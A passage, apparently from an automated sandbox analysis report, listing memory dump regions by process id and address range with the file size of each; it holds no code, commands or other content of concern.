                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2.5MB

                                                                                                                                                                                                                        • memory/4384-1135-0x00000000026B0000-0x0000000002750000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          640KB

                                                                                                                                                                                                                        • memory/4384-817-0x0000000000400000-0x0000000000688000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2.5MB

                                                                                                                                                                                                                        • memory/4384-1133-0x0000000000400000-0x0000000000688000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2.5MB

                                                                                                                                                                                                                        • memory/4384-1081-0x0000000000400000-0x0000000000688000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2.5MB

                                                                                                                                                                                                                        • memory/4384-1113-0x0000000000400000-0x0000000000688000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2.5MB

                                                                                                                                                                                                                        • memory/4384-1088-0x0000000000400000-0x0000000000688000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2.5MB

                                                                                                                                                                                                                        • memory/4892-887-0x0000000000400000-0x0000000000BC1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          7.8MB

                                                                                                                                                                                                                        • memory/4892-974-0x0000000000400000-0x0000000000BC1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          7.8MB

                                                                                                                                                                                                                        • memory/4892-701-0x0000000000400000-0x0000000000BC1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          7.8MB

                                                                                                                                                                                                                        • memory/4892-1085-0x0000000000400000-0x0000000000BC1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          7.8MB

                                                                                                                                                                                                                        • memory/4892-1117-0x0000000000400000-0x0000000000BC1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          7.8MB

                                                                                                                                                                                                                        • memory/4892-1050-0x0000000000400000-0x0000000000BC1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          7.8MB

                                                                                                                                                                                                                        • memory/4892-1140-0x0000000000400000-0x0000000000BC1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          7.8MB

                                                                                                                                                                                                                        • memory/4892-686-0x0000000000400000-0x0000000000BC1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          7.8MB

                                                                                                                                                                                                                        • memory/4892-1092-0x0000000000400000-0x0000000000BC1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          7.8MB

                                                                                                                                                                                                                        • memory/4892-696-0x0000000000400000-0x0000000000BC1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          7.8MB

                                                                                                                                                                                                                        • memory/4892-687-0x0000000000400000-0x0000000000BC1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          7.8MB

                                                                                                                                                                                                                        • memory/4892-695-0x0000000000400000-0x0000000000BC1000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          7.8MB

                                                                                                                                                                                                                        • memory/5036-694-0x0000000000400000-0x00000000004B8000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          736KB

                                                                                                                                                                                                                        • memory/5352-1166-0x0000000004760000-0x0000000004AB7000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          3.3MB

                                                                                                                                                                                                                        • memory/5352-1169-0x0000000004D00000-0x0000000004D4C000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          304KB

                                                                                                                                                                                                                        • memory/5364-986-0x0000000005F70000-0x0000000005FBC000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          304KB

                                                                                                                                                                                                                        • memory/5816-1207-0x0000020C907A0000-0x0000020C907C2000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          136KB

                                                                                                                                                                                                                        • memory/6112-640-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          80KB

                                                                                                                                                                                                                        • memory/6112-693-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          80KB